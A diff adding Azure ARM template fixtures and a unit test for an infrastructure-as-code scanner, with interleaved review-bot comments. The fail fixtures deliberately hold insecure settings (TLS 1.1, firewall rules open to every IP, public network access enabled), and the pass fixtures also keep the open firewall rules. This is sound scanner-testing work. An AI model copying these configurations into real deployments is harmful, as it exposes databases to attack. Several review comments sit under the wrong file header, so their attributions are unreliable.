"Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", 
+ "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_1", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + 
"[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ ]
+ }
+ ],
+ "outputs": {
+ "location": {
+ "type": "string",
+ "value": "[parameters('location')]"
+ },
+ "name": {
+ "type": "string",
+ "value": "[parameters('serverName')]"
+ },
+ "resourceGroupName": {
+ "type": "string",
+ "value": "[resourceGroup().name]"
+ },
+ "resourceId": {
+ "type": "string",
+ "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ }
+ }
+}
diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json
new file mode 100644
index 00000000000..a464424d13c
--- /dev/null
+++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json
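Review bot: The `metadata._generator` block (bicep, `templateHash` `1923296876861958074`) no longer describes this file, which was hand-edited — the identical hash also appears in the sibling pass.json whose content differs — so I would drop the block rather than ship a stale provenance stamp. The fail case covers only `"minimalTlsVersion": "TLS1_1"`; for `Microsoft.DBforMySQL/servers` the API also accepts `TLS1_0` and `TLSEnforcementDisabled`, and a fixture with the property omitted would pin the missing-attribute path, so consider adding at least one of those as a second fail file. Unrelated to TLS, the `firewallrules` variable spans `0.0.0.0`–`255.255.255.255`; if these example directories are ever scanned by checks other than the one under test, that rule will surface as a separate finding, so a narrower placeholder range keeps the fixture focused. The same points apply to example_MySQLServerMinTLSVersion/pass.json.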
@@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", 
+ "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_2", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + 
"[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ ]
+ }
+ ],
+ "outputs": {
+ "location": {
+ "type": "string",
+ "value": "[parameters('location')]"
+ },
+ "name": {
+ "type": "string",
+ "value": "[parameters('serverName')]"
+ },
+ "resourceGroupName": {
+ "type": "string",
+ "value": "[resourceGroup().name]"
+ },
+ "resourceId": {
+ "type": "string",
+ "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ }
+ }
+}
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json
new file mode 100644
index 00000000000..b42eb25b0b6
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json
@@ -0,0 +1,23 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.StorageSync/storageSyncServices",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "tags": {
+ "foo": "bar"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
new file mode 100644
index 00000000000..07ca8e384a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
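Review bot: `location` and `tags` sit inside `properties` of the `Microsoft.StorageSync/storageSyncServices` resource, but in an ARM resource they are top-level siblings of `type`/`name`/`properties`; only `incomingTrafficPolicy` (absent here, which is the failing condition) belongs under `properties`. A fixture whose shape differs from real templates can pass the unit test while saying nothing about how the check behaves on deployable input, so I would move `location` and `tags` up one level. The same layout is used in example_StorageSyncPublicAccessDisabled/fail2.json and pass.json. fail1.json is also the only one of the three without a trailing newline.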
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.StorageSync/storageSyncServices",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "incomingTrafficPolicy": "AllowAllTraffic",
+ "tags": {
+ "foo": "bar"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..ade615191c3
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "incomingTrafficPolicy": "AllowVirtualNetworksOnly",
+ "tags": {
+ "foo": "bar"
+ }
+ },
+ "type": "Microsoft.StorageSync/storageSyncServices"
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
new file mode 100644
index 00000000000..2f14c053353
--- /dev/null
+++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
@@ -0,0 +1,250 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": true + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": { + "type": "AzureKeyVault", + "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike", + "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2" + } + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + 
"defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "{customized property}": "string", + "sku": { + "capacity": "int", + "family": "string", + "name": "string", + "size": "string", + "tier": "string" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "infrastructureEncryption": "string", + "minimalTlsVersion": "string", + "publicNetworkAccess": "enabled", + "sslEnforcement": "string", + "storageProfile": { + "backupRetentionDays": "int", + "geoRedundantBackup": "string", + "storageAutogrow": "string", + "storageMB": "int" + }, + "version": "string", + "createMode": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + 
"name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + 
"template": {
+ "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+ "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+ "apiVersion": "[variables('api')]",
+ "properties": {
+ "value": "[variables('serverParameters')[copyIndex()].value]",
+ "source": "[variables('serverParameters')[copyIndex()].source]"
+ }
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..74538468f41
--- /dev/null
+++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json
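Review bot: `"publicNetworkAccess": "enabled"` is lowercase, whereas the documented values for `Microsoft.DBforMySQL/servers` are `Enabled`/`Disabled`; unless the check normalises case before comparing (not visible here), a fixture in the documented casing — or one of each — is what pins the behaviour real templates will hit, and the sibling pass.json uses lowercase `"disabled"` in the same way. The `dataEncryptionData.defaultValue` embeds a concrete subscription id, a user-assigned identity resource id and a Key Vault key URL with a 32-hex key version; none of that is needed for a public-access check, and values of that shape are exactly what entropy-based secret scanners flag, so replace them with obviously synthetic placeholders such as `"primaryKeyURI": "https://example.vault.azure.net/keys/example/<key-version-placeholder>"`. Separately, the `geoRedundantBackup` parameter is declared `"type": "string"` with `"defaultValue": true`, which an ARM deployment would reject; `"Disabled"` matches the sibling fixtures. As in the MSSQL fixture, the nested deployments here `dependsOn` `flexibleServers` resources that this single-server template never declares.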
@@ -0,0 +1,250 @@
+{
+ "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "apiVersion": {
+ "type": "string",
+ "defaultValue": "2021-05-01"
+ },
+ "administratorLogin": {
+ "type": "string"
+ },
+ "administratorLoginPassword": {
+ "type": "securestring"
+ },
+ "location": {
+ "type": "string"
+ },
+ "serverName": {
+ "type": "string"
+ },
+ "serverEdition": {
+ "type": "string"
+ },
+ "vCores": {
+ "type": "int",
+ "defaultValue": 4
+ },
+ "storageSizeGB": {
+ "type": "int"
+ },
+ "haEnabled": {
+ "type": "string",
+ "defaultValue": "Disabled"
+ },
+ "availabilityZone": {
+ "type": "string",
+ "defaultValue": ""
+ },
+ "standbyAvailabilityZone": {
+ "type": "string"
+ },
+ "version": {
+ "type": "string"
+ },
+ "tags": {
+ "type": "object",
+ "defaultValue": {}
+ },
+ "firewallRules": {
+ "type": "object",
+ "defaultValue": {}
+ },
+ "backupRetentionDays": {
+ "type": "int"
+ },
+ "geoRedundantBackup": {
+ "type": "string",
+ "defaultValue": true
+ },
+ "vmName": {
+ "type": "string",
+ "defaultValue": "Standard_B1ms"
+ },
+ "storageIops": {
+ "type": "int"
+ },
+ "storageAutogrow": {
+ "type": "string",
+ "defaultValue": "Enabled"
+ },
+ "autoIoScaling": {
+ "type": "string",
+ "defaultValue": "Disabled"
+ },
+ "identityData": {
+ "type": "object",
+ "defaultValue": {}
+ },
+ "dataEncryptionData": {
+ "type": "object",
+ "defaultValue": {
+ "type": "AzureKeyVault",
+ "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike",
+ "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2"
+ }
+ },
+ "serverParameters": {
+ "type": "array",
+ "defaultValue": []
+ },
+ "aadEnabled": {
+ "type": "bool",
+ "defaultValue": false
+ },
+ "aadData": {
+ "type": "object",
+ "defaultValue": {}
+ },
+ "guid": {
+ "type": "string",
+ "defaultValue": "[newGuid()]"
+ },
+ "network": {
+ "type": "object",
+ "defaultValue": {}
+ },
+ "firewallRulesAPIVersion": {
+ "type": "string",
+ "defaultValue": "2022-01-01"
+ }
+ },
+ "variables": {
+ "api": "[parameters('apiVersion')]",
+ "firewallRules": "[parameters('firewallRules').rules]",
+ "serverParameters": "[parameters('serverParameters')]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.DBforMySQL/servers",
+ "apiVersion": "2017-12-01",
+ "name": "pass",
+ "location": "string",
+ "tags": {
+ "tagName1": "tagValue1",
+ "tagName2": "tagValue2"
+ },
+ "{customized property}": "string",
+ "sku": {
+ "capacity": "int",
+ "family": "string",
+ "name": "string",
+ "size": "string",
+ "tier": "string"
+ },
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "infrastructureEncryption": "string",
+ "minimalTlsVersion": "string",
+ "publicNetworkAccess": "disabled",
+ "sslEnforcement": "string",
+ "storageProfile": {
+ "backupRetentionDays": "int",
+ "geoRedundantBackup": "string",
+ "storageAutogrow": "string",
+ "storageMB": "int"
+ },
+ "version": "string",
+ "createMode": "string"
+ }
+ },
+ {
+ "condition": "[greater(length(variables('firewallRules')), 0)]",
+ "type": "Microsoft.Resources/deployments",
+ "apiVersion": "2019-08-01",
+ "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]",
+ "copy": {
+ "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]",
+ "mode": "Serial",
+ "name": "firewallRulesIterator"
+ },
+ "dependsOn": [
+ "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+ "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+ ],
+ "properties": {
+ "mode": "Incremental",
+ "template": {
+ "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules",
+ "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]",
+ "apiVersion": "[parameters('firewallRulesAPIVersion')]",
+ "properties": {
+ "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]",
+ "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]"
+ }
+ }
+ ]
+ }
+ }
+ },
+ {
+ "condition": "[parameters('aadEnabled')]",
+ "type": "Microsoft.Resources/deployments",
+ "apiVersion": "2019-08-01",
+ "name": "[concat('addAdmins-', parameters('guid'))]",
+ "dependsOn": [
+ "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]"
+ ],
+ "properties": {
+ "mode": "Incremental",
+ "template": {
+ "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforMySQL/flexibleServers/administrators",
+ "name": "[concat(parameters('serverName'),'/ActiveDirectory')]",
+ "apiVersion": "[variables('api')]",
+ "properties": {
+ "administratorType": "[parameters('aadData').administratorType]",
+ "identityResourceId": "[parameters('aadData').identityResourceId]",
+ "login": "[parameters('aadData').login]",
+ "sid": "[parameters('aadData').sid]",
+ "tenantId": "[parameters('aadData').tenantId]"
+ }
+ }
+ ]
+ }
+ }
+ },
+ {
+ "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]",
+ "type": "Microsoft.Resources/deployments",
+ "apiVersion": "2019-08-01",
+ "copy": {
+ "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]",
+ "mode": "serial",
+ "name": "serverParametersIterator"
+ },
+ "dependsOn": [
+ "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+ "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+ ],
+ "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]",
+ "properties": {
+ "mode": "Incremental",
+ "template": {
+ "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+ "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+ "apiVersion": "[variables('api')]",
+ "properties": {
+ "value": "[variables('serverParameters')[copyIndex()].value]",
+ "source": "[variables('serverParameters')[copyIndex()].source]"
+ }
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py
new file mode 100644
index 00000000000..13edb50bf9d
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py
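Review bot: The `dataEncryptionData` default value embeds what looks like a real subscription id, a user-assigned identity resource id and a Key Vault key URI; the check only needs syntactically plausible values, so replace them with clearly fake placeholders (an all-zero subscription GUID and an `example` vault name) so the fixture neither leaks tenant details nor has to be excluded from secrets scanning. `geoRedundantBackup` is declared `"type": "string"` but its `defaultValue` is the boolean `true`, which an ARM deployment would reject. The passing resource sets `"publicNetworkAccess": "disabled"` in lowercase where Azure documents `Disabled`; if the check compares case-sensitively this fixture would not exercise the intended pass path, so it is worth confirming against the check. The nested deployments also `dependsOn` a `Microsoft.DBforMySQL/flexibleServers/` resource the template never declares (it declares `Microsoft.DBforMySQL/servers`), harmless for the static check but misleading for anyone copying the fixture.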
@@ -0,0 +1,43 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppGWDefinesSecureProtocols import check
+
+
+class TestAppGWDefinesSecureProtocols(unittest.TestCase):
+
+ def test(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ test_files_dir = os.path.join(current_dir, "example_AppGWDefinesSecureProtocols")
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ 'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_pass',
+ 'Microsoft.Network/applicationGateways.with_policyName_pass1'
+ }
+ failing_resources = {
+ 'Microsoft.Network/applicationGateways.without_sslPolicy_fail',
+ 'Microsoft.Network/applicationGateways.empty_sslPolicy_fail1',
+ 'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_fail2',
+ 'Microsoft.Network/applicationGateways.with_policyName_fail3',
+ }
+ skipped_resources = {}
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+
+ self.assertEqual(summary['passed'], len(passing_resources))
+ self.assertEqual(summary['failed'], len(failing_resources))
+ self.assertEqual(summary['skipped'], len(skipped_resources))
+ self.assertEqual(summary['parsing_errors'], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServiceDisallowCORS.py b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py
new file mode 100644
index 00000000000..6de73058d88
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py
